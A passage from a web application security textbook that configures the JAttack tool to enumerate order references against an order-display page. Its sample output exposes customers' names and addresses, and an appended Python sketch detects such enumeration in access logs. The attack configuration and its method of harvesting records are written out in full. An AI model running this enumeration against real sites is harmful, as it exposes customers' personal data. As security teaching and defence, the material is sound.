The Web Application Hacker’s Handbook Discovering and Exploiting Security Flaws


Chapter 13  ■ Automating Bespoke Attacks



That is all we need to change within the tool's actual code. To configure JAttack to target the actual request in which we are interested, we need to update its attack configuration as follows:

String method = "POST";
String url = "/ShowOrder.jsp";
Param[] params = new Param[]
{
    new Param("SessionId", "21298FE012EEA892981", Param.Type.COOKIE, false),
    new Param("OrderRef", "1003073781", Param.Type.BODY, true),
    new Param("OrderType", "retail", Param.Type.BODY, false),
};
PayloadSource payloads = new PSNumbers(1003073700, 1003073800, 1);



This configuration instructs JAttack to make POST requests to the relevant URL, containing the three required parameters. Only one of these will actually be modified, using the range of potential order numbers specified.

When we now run JAttack, we obtain the following output:

OrderRef  1003073700   500   300
OrderRef  1003073701   500   300
...
OrderRef  1003073773   500   300
OrderRef  1003073774   200   27489     P Orac          13, Fairyland St
OrderRef  1003073775   200   28991     S Hammad        1, Stews Place
OrderRef  1003073776   200   29430     Adam Matthews   Flat 12a, G Community
OrderRef  1003073777   200   28224     Mike Kemp       6, Carshalton Rd
OrderRef  1003073778   200   28171     Martin Murfitt  Jn15, South Circular
OrderRef  1003073779   200   27880     D Senior        The Old Doss House
OrderRef  1003073780   200   28901     Ian Peters      Penthouse Suite
OrderRef  1003073781   200   27388     Phill Bellend   52, Throwley Way
OrderRef  1003073782   500   300
OrderRef  1003073783   500   300
...

As you can see, the attack was successful and captured the personal details of some customers. It appears that when an invalid order number is submitted, the server encounters an error and a 500 response code is returned. It also appears that none of the order numbers below 1003073774 were valid. This suggests that only eight orders have been placed today, and the order numbers we should target are 0903073773 and below. By writing a quick custom payload source for JAttack, we could generate payloads automatically, using the scheme employed by the application.
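From the defender's side, the run above leaves a distinctive trace: one session walks consecutive OrderRef values against /ShowOrder.jsp and draws mostly 500 responses. The following detection sketch is an added example, not code from the book or from JAttack; the access-log line format, the second session identifier and the thresholds are assumptions.

```python
import re
from collections import defaultdict

# Assumed log line format (not the book's): <session> <method> <path> <body> <status>
LINE_RE = re.compile(
    r"^(?P<sess>\S+) (?P<method>[A-Z]+) (?P<path>\S+) "
    r"OrderRef=(?P<ref>\d+)\S* (?P<status>\d{3})$"
)

def build_sample_log():
    """Constructed sample mirroring the JAttack run above: one session sweeps
    1003073700..1003073790, only 1003073774..1003073781 exist (200), the rest
    return 500. A second, benign session (constructed id) views two of its own orders."""
    lines = []
    for ref in range(1003073700, 1003073791):
        status = 200 if 1003073774 <= ref <= 1003073781 else 500
        lines.append(f"21298FE012EEA892981 POST /ShowOrder.jsp "
                     f"OrderRef={ref}&OrderType=retail {status}")
    lines.append("7A1C0FFEE POST /ShowOrder.jsp OrderRef=1003073774&OrderType=retail 200")
    lines.append("7A1C0FFEE POST /ShowOrder.jsp OrderRef=1003073779&OrderType=retail 200")
    return lines

def longest_consecutive_run(values):
    """Length of the longest run of consecutive integers in values."""
    best = run = 0
    prev = None
    for v in sorted(set(values)):
        run = run + 1 if prev is not None and v == prev + 1 else 1
        best = max(best, run)
        prev = v
    return best

def detect_enumeration(lines, path="/ShowOrder.jsp", min_run=10, min_error_ratio=0.5):
    """Flag sessions that walk consecutive OrderRef values against path and
    mostly draw 500s: the signature of guessing references that do not exist
    or are not theirs. Returns {session: (run_length, error_ratio)}."""
    per_sess = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line)
        if m and m["path"] == path:
            per_sess[m["sess"]].append((int(m["ref"]), int(m["status"])))
    findings = {}
    for sess, reqs in per_sess.items():
        run = longest_consecutive_run([ref for ref, _ in reqs])
        error_ratio = sum(1 for _, st in reqs if st >= 500) / len(reqs)
        if run >= min_run and error_ratio >= min_error_ratio:
            findings[sess] = (run, round(error_ratio, 2))
    return findings
```

Detection like this only narrows the window; the underlying flaw is that ShowOrder.jsp returns any order whose reference is guessed, so the fix is to check that the requested order belongs to the authenticated session before rendering it.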

